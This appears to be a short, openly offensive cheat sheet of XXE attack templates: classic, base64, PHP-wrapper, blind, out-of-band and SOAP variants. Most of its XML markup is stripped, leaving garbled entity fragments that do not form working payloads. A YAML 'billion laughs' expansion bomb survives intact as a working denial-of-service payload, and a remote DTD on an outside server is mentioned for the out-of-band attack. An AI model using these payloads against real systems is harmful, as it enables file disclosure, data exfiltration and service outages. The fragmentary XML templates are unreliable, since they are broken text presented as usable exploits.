# XXE Templates
The following are common templates that you can use to exploit XXE vulnerabilities and
easily demonstrate their impact:
Basic test:
]>
Juan
&example;
Classic XXE:
]>
&file;
]>&xxe;
]>&xxe;
Classic XXE Base64 encoded:
%init;
]>
A PHP wrapper inside an XXE:
]>
Jean &xxe; Dupont
00 11 22 33 44
42 rue du CTF
75000
Paris
]>
&xxe;
Followed by a DoS:
]>
&a4;
```yaml
a: &a ["lol","lol","lol","lol","lol","lol","lol","lol","lol"]
b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]
c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]
d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]
e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]
f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]
g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]
h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]
i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]
```
Blind XXE:
]
>
&callhome;
XXE OOB Attack (Yunusov, 2013):
&send;
File stored on http://publicServer.com/parameterEntity_oob.dtd
">
%all;
XXE inside SOAP:
%dtd;]>]]>